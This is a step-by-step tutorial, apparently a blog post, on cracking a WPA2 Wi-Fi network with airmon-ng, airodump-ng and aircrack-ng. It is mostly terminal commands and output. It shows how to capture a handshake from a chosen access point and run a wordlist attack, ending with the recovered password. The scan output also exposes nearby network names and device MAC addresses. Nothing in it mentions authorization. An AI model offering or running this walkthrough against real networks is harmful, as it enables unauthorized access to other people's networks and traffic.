To start a Wireless interface in monitor mode, use this command. This will create a new interface that we may use to attempt to crack a wireless WPA2 network.
┌─[root@parrot]─[/home/user] └──╼ #airmon-ng start wlan1 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 1142 NetworkManager 1253 wpa_supplicant PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01) phy2 wlan1 rtl8187 Realtek Semiconductor Corp. RTL8187 (mac80211 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon) (mac80211 station mode vif disabled for [phy2]wlan1) |
Now get a listing of all wireless networks and MAC addresses using the new monitor interface.
─[root@parrot]─[/home/user] └──╼ #airodump-ng wlan1mon |
This is the output that you should get. A listing of all MAC addresses and wireless networks.
CH 7 ][ Elapsed: 24 s ][ 2017-07-26 01:40 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:25:00:FF:94:73 -1 0 0 0 -1 -1 <length: 0> E0:B9:E5:B8:31:BB -30 29 17 0 11 54e WPA2 CCMP PSK OPTUSVD3AEDEA FA:AB:05:96:21:1A -61 4 0 0 1 54e OPN Telstra Air FA:AB:05:96:21:1B -62 4 1 0 1 54e OPN Fon WiFi F8:AB:05:96:20:19 -62 9 0 0 1 54e WPA2 CCMP PSK Telstra962013 E0:B9:E5:6E:D3:69 -59 36 49 2 6 54e WPA2 CCMP PSK Telstra6ED369 C4:EA:1D:6A:65:D7 -64 14 0 0 1 54e WPA2 CCMP PSK Telstra6A65D7 FA:AB:05:CF:98:E2 -64 9 0 0 6 54e OPN Telstra Air F8:AB:05:CF:97:E1 -65 9 0 0 6 54e WPA2 CCMP PSK TelstraCF97DB FA:AB:05:CF:98:E3 -65 12 0 0 6 54e OPN Fon WiFi C6:EA:1D:6C:4D:34 -66 2 0 0 6 54e. OPN Fon WiFi C4:EA:1D:6C:4D:31 -68 2 0 0 6 54e WPA2 CCMP PSK Telstra6C4D31 BSSID STATION PWR Rate Lost Frames Probe 00:25:00:FF:94:73 EE:3F:54:D9:F1:03 -16 0 -12 101 37 E0:B9:E5:B8:31:BB 8C:79:67:9A:44:4A -36 0 - 1 0 1 FA:AB:05:96:21:1B C4:42:02:8F:BC:58 -69 0 - 1e 0 5 |
Now we focus on one wireless network to capture a handshake, which is a user connecting to a wireless network.
┌─[root@parrot]─[/home/user] └──╼ #airodump-ng --bssid E0:B9:E5:B8:31:BB -c 11 --write password wlan1mon |
And I was successful, the WPA handshake text tells me that I have captured a 3-way handshake.
CH 11 ][ Elapsed: 2 mins ][ 2017-07-26 01:48 ][ WPA handshake: E0:B9:E5:B8:31:BB BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E0:B9:E5:B8:31:BB -21 100 1685 466 0 11 54e WPA2 CCMP PSK OPTUSVD3AEDEA BSSID STATION PWR Rate Lost Frames Probe E0:B9:E5:B8:31:BB 8C:79:67:9A:44:4A -30 1e- 1 0 54 E0:B9:E5:B8:31:BB F0:25:B7:FA:01:4A -32 1e- 1e 0 22 |
Now it is time to crack the cap file. Use a very large wordlist file if you are not sure about what the password is. This will not work unless the password is in the wordlist.
┌─[root@parrot]─[/home/user] └──╼ #aircrack-ng password-01.cap -w rockyou.txt |
And I was successful. The WPA2 Pre Shared Key was cracked easily. This is easier if there are a lot of users on the network that are constantly connecting, makes capturing a key easier.
Aircrack-ng 1.2 rc4 [00:00:00] 24/7120716 keys tested (870.89 k/s) Time left: 2 hours, 16 minutes, 24 seconds 0.00% KEY FOUND! [ debian589547FFG ] Master Key : 81 B4 24 04 9A 4B 3B D3 15 D6 D6 46 92 3C 9E 1B 24 3E 47 47 F7 74 B6 F2 40 E8 A3 26 ED 36 79 CF Transient Key : 41 87 8E 9A 9B 95 83 7A 15 B6 6C 31 9B DA 64 34 57 BD 01 19 7C E5 6D 25 C0 61 00 1E 50 51 9D 6A AB 7F 30 A9 FE D7 42 32 CB E9 D5 08 5A D8 FE FC D5 2A 28 77 C2 9A 2F 97 70 D0 87 44 A7 60 0E 49 EAPOL HMAC : 4F 40 BA D7 D7 02 87 57 B8 AA 63 02 7D B7 F4 72 |